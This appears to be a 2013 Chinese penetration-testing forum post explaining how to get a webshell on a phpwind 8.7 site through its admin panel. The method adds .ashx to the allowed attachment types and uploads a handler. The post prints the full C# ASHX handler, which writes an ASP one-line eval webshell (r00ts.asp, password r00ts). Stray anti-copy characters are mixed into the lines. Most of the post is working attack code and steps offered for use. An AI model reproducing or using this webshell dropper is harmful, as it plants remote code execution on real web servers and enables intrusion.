找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpwind 8.7 后台拿shell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1972|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
# E' g; \6 t+ H 4 {4 Z& S$ W5 R
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx  \* e  B4 V& Y, H

9 y$ L$ Y- J; H+ Z$ P* n0 ]发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整4 s, _5 n% T8 E% T0 L0 z: c* K

; _% Y& B( s' w4 p2 [然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx( T3 q5 Y. z; u& p- T0 ^

" T0 y# q+ S/ U5 }1 h/ @$ _打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
: e# ]" B" W% A  e . g. V; l* M$ l8 B/ n
下面是代码:3 k( ^/ R- s9 O! o

8 d/ r: ?( K; ]9 q" q) ^4 w<%@ WebHandler Language="C#"Class="Handler" %>& P. d) i6 ]- D0 {% V' M! ^( g
using System;2 @3 a* o$ V: [( x: M
using System.Web;
' ?2 W$ c/ I: a9 E* c9 ?; zusing System.IO;
2 ~1 V  C# B/ ^- k; |public class Handler : IHttpHandler {8 G4 s! [1 e7 ^* f) |' m
public void ProcessRequest (HttpContext context) {1 c  S' `( n5 [3 R
context.Response.ContentType = "text/plain";
& F# m# A6 v1 PStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
* ^' ~! G- {( H3 M. G5 nfile1.Write("<%eval request(\"r00ts\")%>");+ H3 Q% d) b9 U
file1.Flush();7 M7 M- c" j* ], q- X! z# g. G) g
file1.Close();
# P2 l# `8 v2 V* P* }3 q}4 q; b: [  f- C; f
public bool IsReusable {2 \4 C. ^: ]: p; W9 c
get {& F+ x  F( E8 B  v$ h9 n5 m9 b1 Q
return false;
3 @( B' T+ X- e4 n6 Z: z% L$ z3 Y}# n; b6 P" {$ i0 I/ n( r) y6 o
}' G. a/ ?3 K" \. S
}  F4 \& s  e2 j+ Z8 X" ]) B
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表